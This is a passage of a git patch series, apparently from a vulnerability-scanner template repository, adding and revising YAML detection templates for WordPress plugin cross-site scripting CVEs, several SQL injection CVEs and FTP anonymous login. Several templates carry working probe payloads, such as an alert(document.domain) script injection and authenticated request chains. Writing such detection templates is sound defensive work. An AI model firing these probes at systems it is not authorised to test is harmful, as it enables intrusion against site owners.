'{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "")' + - 'contains(body, "wpb_jplayer_setting")' + - 'contains(content_type, "text/html")' + condition: and \ No newline at end of file From e92cb274f035718e9fa4793be2017e670a612580 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 15 Nov 2022 22:48:53 +0530 Subject: [PATCH 0321/1415] Added template for CVE-2022-3578 --- cves/2022/CVE-2022-3578.yaml | 46 ++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 cves/2022/CVE-2022-3578.yaml diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml new file mode 100644 index 0000000000..6b3be8a57a --- /dev/null +++ b/cves/2022/CVE-2022-3578.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-3578 + +info: + name: ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The ProfileGrid WordPress plugin before 5.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 + - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 + tags: wp-plugin,wp,xss,authenticated,wpscan,cve,cve2022 + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=pm_add_group&id="> HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '' + - 'Extension Options' + condition: and + + - type: word + part: header_2 + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file From b6e3d74f6069790d76918f2aa27bf7a5000a7b5b Mon Sep 17 00:00:00 2001 From: "Yuzhe.Zhang" Date: Tue, 15 Nov 2022 16:38:28 -0500 Subject: [PATCH 0322/1415] fixed visionhub default login template so that an Adminer login panel won't trigger a false positive. --- default-logins/visionhub/visionhub-default-login.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/default-logins/visionhub/visionhub-default-login.yaml b/default-logins/visionhub/visionhub-default-login.yaml index 91e0f51048..7b5c24777b 100644 --- a/default-logins/visionhub/visionhub-default-login.yaml +++ b/default-logins/visionhub/visionhub-default-login.yaml @@ -34,6 +34,12 @@ requests: - "Set-Cookie: admin" part: header + - type: word + words: + - "Set-Cookie: adminer_key" + part: header + negative: true + - type: status status: - 200 From 9b3a9917770885453de08bae57c1e9efd061f529 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 16 Nov 2022 11:52:46 +0530 Subject: [PATCH 0324/1415] Update CVE-2022-3578.yaml --- cves/2022/CVE-2022-3578.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index 6b3be8a57a..a7222a6410 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -10,7 +10,9 @@ info: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 - tags: wp-plugin,wp,xss,authenticated,wpscan,cve,cve2022 + metadata: + verified: true + tags: cve,cve2022,wp-plugin,wp,xss,authenticated,wpscan,wordpress,profilegrid-user-profiles-groups-and-communities requests: - raw: @@ -43,4 +45,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 731a2794318f532787faf31f928963a69d80d285 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 16 Nov 2022 12:22:06 +0530 Subject: [PATCH 0325/1415] Update discord-backup-code.yaml --- file/keys/discord-backup-code.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/discord-backup-code.yaml b/file/keys/discord-backup-code.yaml index cfdff5c702..c253fa200b 100644 --- a/file/keys/discord-backup-code.yaml +++ b/file/keys/discord-backup-code.yaml @@ -8,7 +8,7 @@ info: file: - extensions: - - all + - txt extractors: - type: regex From 6372a635b8f98c839520bbe21237034de5389f80 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 16 Nov 2022 12:22:36 +0530 Subject: [PATCH 0326/1415] Update discord-backup-code.yaml --- file/keys/discord-backup-code.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/discord-backup-code.yaml b/file/keys/discord-backup-code.yaml index c253fa200b..cfdff5c702 100644 --- a/file/keys/discord-backup-code.yaml +++ b/file/keys/discord-backup-code.yaml @@ -8,7 +8,7 @@ info: file: - extensions: - - txt + - all extractors: - type: regex From a91daf067004eaa0bfb292f902c7a63a598f74d6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 13:46:13 +0530 Subject: [PATCH 0327/1415] Update CVE-2021-43510.yaml --- cves/2021/CVE-2021-43510.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43510.yaml b/cves/2021/CVE-2021-43510.yaml index 585ba99cf9..12b31f1ae4 100644 --- a/cves/2021/CVE-2021-43510.yaml +++ b/cves/2021/CVE-2021-43510.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2021-43510 metadata: verified: true - tags: cve,cve2021,simpleclientmanagement,sqli + tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass requests: - raw: From cea1f4e75f5906b7dfca52697cfd6afd4f888f6f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:06:26 +0530 Subject: [PATCH 0328/1415] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 4e6f9e372b..e7e4ed73ba 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2020-21012 metadata: verified: true - tags: cve,cve2020,hotel,sqli + tags: cve,cve2020,hotel,sqli,unauth requests: - raw: From 0805badc05f07f6c9afb30561bb94f93b6a7d0fa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 08:38:09 +0000 Subject: [PATCH 0329/1415] Auto Generated New Template Addition List [Wed Nov 16 08:38:09 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 40ec314ef9..0422a9e942 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2021/CVE-2021-43510.yaml cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml exposed-panels/opencpu-panel.yaml From 46c5abc967e19f5d3792d8e6486144bd85f0ead1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:12:46 +0530 Subject: [PATCH 0330/1415] Update CVE-2020-29284.yaml --- cves/2020/CVE-2020-29284.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-29284.yaml b/cves/2020/CVE-2020-29284.yaml index c7c8117bc7..28685be2d0 100644 --- a/cves/2020/CVE-2020-29284.yaml +++ b/cves/2020/CVE-2020-29284.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2020-29284 metadata: verified: true - tags: cve,cve2020,tablereservation,sqli + tags: cve,cve2020,tablereservation,sqli,unauth requests: - method: GET From b4221613c2acf1900e074a1025d75c64bab305b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 08:47:22 +0000 Subject: [PATCH 0331/1415] Auto Generated New Template Addition List [Wed Nov 16 08:47:22 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0422a9e942..73002567bd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2020/CVE-2020-21012.yaml cves/2021/CVE-2021-43510.yaml cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml From c45ac87f71437c06e201d06b31c456e404f06a89 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 08:48:07 +0000 Subject: [PATCH 0332/1415] Auto Generated New Template Addition List [Wed Nov 16 08:48:07 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 73002567bd..eb977ddd67 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2020/CVE-2020-21012.yaml +cves/2020/CVE-2020-29284.yaml cves/2021/CVE-2021-43510.yaml cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml From f208977345ed31725a18dd0c2d1d8a2b224536c7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 08:52:58 +0000 Subject: [PATCH 0333/1415] Auto Generated CVE annotations [Wed Nov 16 08:52:58 UTC 2022] :robot: --- cves/2021/CVE-2021-43510.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43510.yaml b/cves/2021/CVE-2021-43510.yaml index 12b31f1ae4..860b233cdc 100644 --- a/cves/2021/CVE-2021-43510.yaml +++ b/cves/2021/CVE-2021-43510.yaml @@ -11,9 +11,12 @@ info: - https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-43510 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-43510 + cwe-id: CWE-89 metadata: - verified: true + verified: "true" tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass requests: From fb6df2541b39610cd2990e92519d55444b74d08a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:42:34 +0530 Subject: [PATCH 0334/1415] Update and rename unauth-ftp.yaml to ftp-anonymous-login.yaml --- ...{unauth-ftp.yaml => ftp-anonymous-login.yaml} | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) rename network/{unauth-ftp.yaml => ftp-anonymous-login.yaml} (59%) diff --git a/network/unauth-ftp.yaml b/network/ftp-anonymous-login.yaml similarity index 59% rename from network/unauth-ftp.yaml rename to network/ftp-anonymous-login.yaml index dda01dcc57..1e13340f5d 100644 --- a/network/unauth-ftp.yaml +++ b/network/ftp-anonymous-login.yaml @@ -1,4 +1,4 @@ -id: unauth-ftp +id: ftp-anonymous-login info: name: FTP Anonymous Login @@ -6,14 +6,16 @@ info: severity: medium reference: - https://tools.ietf.org/html/rfc2577 - tags: network,ftp description: | Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended. - + tags: network,ftp network: - inputs: - - data: "USER anonymous\r\nPASS nuclei\r\n" + - data: "USER anonymous\r\n" + read: 1024 + - data: "PASS anonymous\r\n" + read: 1024 host: - "{{Host}}:21" @@ -23,6 +25,6 @@ network: - type: word words: - "Anonymous access allowed," - - "220" #code is sent in response to a new user connecting to the FTP server to indicate that the server is ready for the new client. - - "230" #The server sends a 230 code in response to a command that has provided sufficient credentials to the server to grant the user access to the FTP server. - part: response + - "Logged in anonymously" + - "230" + condition: or From b32451f547ede250c28a2281128dddbc3bb1f484 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:46:06 +0530 Subject: [PATCH 0335/1415] Update ftp-anonymous-login.yaml --- network/ftp-anonymous-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/ftp-anonymous-login.yaml b/network/ftp-anonymous-login.yaml index 1e13340f5d..c4dfcdbf08 100644 --- a/network/ftp-anonymous-login.yaml +++ b/network/ftp-anonymous-login.yaml @@ -2,13 +2,13 @@ id: ftp-anonymous-login info: name: FTP Anonymous Login - author: C3l3si4n + author: C3l3si4n,pussycat0x severity: medium reference: - https://tools.ietf.org/html/rfc2577 description: | Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended. - tags: network,ftp + tags: network,ftp,default-login network: - inputs: From 6052658c1a42c0caa27d130471e9cda852775114 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:46:24 +0530 Subject: [PATCH 0336/1415] Delete ftp-default-credentials.yaml --- network/ftp-default-credentials.yaml | 24 ------------------------ 1 file changed, 24 deletions(-) delete mode 100644 network/ftp-default-credentials.yaml diff --git a/network/ftp-default-credentials.yaml b/network/ftp-default-credentials.yaml deleted file mode 100644 index 0f0c5eecb7..0000000000 --- a/network/ftp-default-credentials.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: ftp-default-credentials - -info: - name: FTP Service with anonymous Login - author: pussycat0x - severity: info - tags: network,ftp,default-login,service - description: | - Using the Internet's File Transfer Protocol (FTP), anonymous FTP is a method for giving users access to files so that they don't need to identify themselves to the server. - -network: - - - inputs: - - data: "USER anonymous\r\nPASS anonymous\r\n" - host: - - "{{Hostname}}" - - "{{Host}}:21" - - matchers: - - type: word - words: - - "230" - - "Anonymous user logged in" - condition: and From d3b9eb6f7adbe830b19f6932c8e076f7130ad0ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 09:28:03 +0000 Subject: [PATCH 0338/1415] Auto Generated New Template Addition List [Wed Nov 16 09:28:03 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eb977ddd67..bf23576c4e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2020/CVE-2020-21012.yaml +cves/2020/CVE-2020-24903.yaml cves/2020/CVE-2020-29284.yaml cves/2021/CVE-2021-43510.yaml cves/2022/CVE-2022-1442.yaml From b2aae650095b76481e94d96883e5a02acbe04ad4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 09:30:56 +0000 Subject: [PATCH 0339/1415] Auto Generated New Template Addition List [Wed Nov 16 09:30:56 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bf23576c4e..011a0a0552 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2020/CVE-2020-21012.yaml +cves/2020/CVE-2020-24902.yaml cves/2020/CVE-2020-24903.yaml cves/2020/CVE-2020-29284.yaml cves/2021/CVE-2021-43510.yaml From 57f00c877dff89c9639f48dee651bdbcc063180b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Nov 2022 15:01:54 +0530 Subject: [PATCH 0340/1415] Update CVE-2022-3578.yaml --- cves/2022/CVE-2022-3578.yaml | 27 +++++++++------------------ 1 file changed, 9 insertions(+), 18 deletions(-) diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index a7222a6410..df843c416e 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -1,7 +1,7 @@ id: CVE-2022-3578 info: - name: ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting + name: ProfileGrid < 5.1.1 - Cross-Site Scripting author: theamanrawat severity: medium description: | @@ -12,7 +12,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 metadata: verified: true - tags: cve,cve2022,wp-plugin,wp,xss,authenticated,wpscan,wordpress,profilegrid-user-profiles-groups-and-communities + tags: cve,cve2022,wp-plugin,wp,wordpress,xss,profilegrid,authenticated requests: - raw: @@ -24,25 +24,16 @@ requests: log={{username}}&pwd={{password}}&wp-submit=Log+In - | - GET /wp-admin/admin.php?page=pm_add_group&id="> HTTP/1.1 + GET /wp-admin/admin.php?page=pm_add_group&id=">&tab")' condition: and - - - type: word - part: header_2 - words: - - text/html - - - type: status - status: - - 200 From 93205c282d6bd15fb00a11d1f2fe752e11fbb5af Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Nov 2022 15:04:37 +0530 Subject: [PATCH 0341/1415] Update CVE-2022-3578.yaml --- cves/2022/CVE-2022-3578.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index df843c416e..5c6fde85fc 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -10,6 +10,8 @@ info: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 + classification: + cve-id: CVE-2022-3578 metadata: verified: true tags: cve,cve2022,wp-plugin,wp,wordpress,xss,profilegrid,authenticated From aa81c41cd2744eab378f52cc56bca853b8fc385f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 09:38:10 +0000 Subject: [PATCH 0342/1415] Auto Generated CVE annotations [Wed Nov 16 09:38:10 UTC 2022] :robot: --- cves/2020/CVE-2020-21012.yaml | 5 ++++- cves/2020/CVE-2020-29284.yaml | 8 ++++++-- 2 files changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index e7e4ed73ba..94a7ac3d0a 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -11,9 +11,12 @@ info: - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-21012 + cwe-id: CWE-89 metadata: - verified: true + verified: "true" tags: cve,cve2020,hotel,sqli,unauth requests: diff --git a/cves/2020/CVE-2020-29284.yaml b/cves/2020/CVE-2020-29284.yaml index 28685be2d0..7186c6e346 100644 --- a/cves/2020/CVE-2020-29284.yaml +++ b/cves/2020/CVE-2020-29284.yaml @@ -10,11 +10,15 @@ info: - https://www.exploit-db.com/exploits/48984 - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 + - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-29284 + cwe-id: CWE-89 metadata: - verified: true - tags: cve,cve2020,tablereservation,sqli,unauth + verified: "true" + tags: cve2020,tablereservation,sqli,unauth,edb,cve requests: - method: GET From 357d4da6c192165037a7ca006fd4f026268f7fda Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 16 Nov 2022 15:09:24 +0530 Subject: [PATCH 0343/1415] Update CVE-2022-0349.yaml --- cves/2022/CVE-2022-0349.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index c3c61e076c..ccd9bc58bf 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -19,6 +19,7 @@ info: requests: - raw: - | + @timeout: 15s POST /?rest_route=/notificationx/v1/analytics HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded From 336d76e43ae922d8149c732ea286aa05e8dd9ebb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 09:41:40 +0000 Subject: [PATCH 0344/1415] Auto Generated New Template Addition List [Wed Nov 16 09:41:40 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 011a0a0552..2c9616314d 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2020/CVE-2020-24902.yaml cves/2020/CVE-2020-24903.yaml cves/2020/CVE-2020-29284.yaml cves/2021/CVE-2021-43510.yaml +cves/2022/CVE-2022-0349.yaml cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml exposed-panels/opencpu-panel.yaml From a51f092b10d22e3e68a7b736daa7af3381e032df Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 09:56:41 +0000 Subject: [PATCH 0345/1415] Auto Generated CVE annotations [Wed Nov 16 09:56:41 UTC 2022] :robot: --- cves/2020/CVE-2020-24902.yaml | 7 +++++-- cves/2020/CVE-2020-24903.yaml | 7 +++++-- cves/2022/CVE-2022-0349.yaml | 7 +++++-- 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/cves/2020/CVE-2020-24902.yaml b/cves/2020/CVE-2020-24902.yaml index 6cb1c13a1c..3387fe75e7 100644 --- a/cves/2020/CVE-2020-24902.yaml +++ b/cves/2020/CVE-2020-24902.yaml @@ -10,11 +10,14 @@ info: - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2020-24902 + cwe-id: CWE-79 metadata: - verified: true - shodan-query: http.title:"My Download Server" google-dork: intitle:"My Download Server" + shodan-query: http.title:"My Download Server" + verified: "true" tags: cve,cve2020,quixplorer,xss requests: diff --git a/cves/2020/CVE-2020-24903.yaml b/cves/2020/CVE-2020-24903.yaml index 50f78183e7..f50b7c92c8 100644 --- a/cves/2020/CVE-2020-24903.yaml +++ b/cves/2020/CVE-2020-24903.yaml @@ -10,11 +10,14 @@ info: - https://seclists.org/bugtraq/2016/Mar/104 - https://nvd.nist.gov/vuln/detail/CVE-2020-24903 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2020-24903 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.component:"ASP.NET" - tags: cve,cve2022,cuteeditor,xss + verified: "true" + tags: cve,cve2022,cuteeditor,xss,seclists requests: - method: GET diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index ccd9bc58bf..77ba737895 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/notificationx/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-0349 + cwe-id: CWE-89 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx + verified: "true" + tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve requests: - raw: From 9a2fdd421b609d0ff262c71e5467a28dacb1cdeb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Nov 2022 16:22:06 +0530 Subject: [PATCH 0346/1415] Update CVE-2022-3484.yaml --- cves/2022/CVE-2022-3484.yaml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index ca5322d830..6484fd48d1 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -1,7 +1,7 @@ id: CVE-2022-3484 info: - name: WPB Show Core - Reflected Cross-Site Scripting + name: WPB Show Core - Cross-Site Scripting author: theamanrawat severity: medium description: | @@ -10,25 +10,21 @@ info: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2022-3484 - cwe-id: CWE-79 metadata: - verified: "true" - tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan + verified: true + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,wpb-show-core requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=' + - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains(body, "")' - - 'contains(body, "wpb_jplayer_setting")' - 'contains(content_type, "text/html")' - condition: and \ No newline at end of file + - 'contains(body, "wpb_jplayer_setting")' + - 'contains(body, "")' + condition: and From bb2fe4dd8d6dfc9742fd7026f72a275ec520891f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Nov 2022 16:23:45 +0530 Subject: [PATCH 0347/1415] Update CVE-2022-3484.yaml --- cves/2022/CVE-2022-3484.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index 6484fd48d1..5c780fff47 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -13,6 +13,7 @@ info: cve-id: CVE-2022-3484 metadata: verified: true + google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php tags: cve,cve2022,wp,wordpress,wp-plugin,xss,wpb-show-core requests: From 2d4ecae237e6e6b38c2d9b3cead21db38603283c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 10:54:35 +0000 Subject: [PATCH 0348/1415] Auto Generated New Template Addition List [Wed Nov 16 10:54:35 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2c9616314d..2e7ec6769e 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ cves/2021/CVE-2021-43510.yaml cves/2022/CVE-2022-0349.yaml cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml +cves/2022/CVE-2022-3578.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/xibocms-login.yaml From e72e947f5315dc36c0bc36fec13b4cd84ee0e955 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 11:09:31 +0000 Subject: [PATCH 0349/1415] Auto Generated CVE annotations [Wed Nov 16 11:09:31 UTC 2022] :robot: --- cves/2022/CVE-2022-3578.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index 5c6fde85fc..fa202c5b49 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2022-3578 metadata: verified: true - tags: cve,cve2022,wp-plugin,wp,wordpress,xss,profilegrid,authenticated + tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 requests: - raw: From c5d73a08755fa4e65b33d81fc3d33da14e7c57d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 11:14:20 +0000 Subject: [PATCH 0350/1415] Auto Generated New Template Addition List [Wed Nov 16 11:14:20 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2e7ec6769e..bd732faebd 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ cves/2021/CVE-2021-43510.yaml cves/2022/CVE-2022-0349.yaml cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml +cves/2022/CVE-2022-3484.yaml cves/2022/CVE-2022-3578.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml From 3535c94b80c6b55f4c4c9a49a448edd8f475c1b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 11:29:23 +0000 Subject: [PATCH 0351/1415] Auto Generated CVE annotations [Wed Nov 16 11:29:23 UTC 2022] :robot: --- cves/2022/CVE-2022-3484.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index 5c780fff47..f38e355c56 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -14,7 +14,7 @@ info: 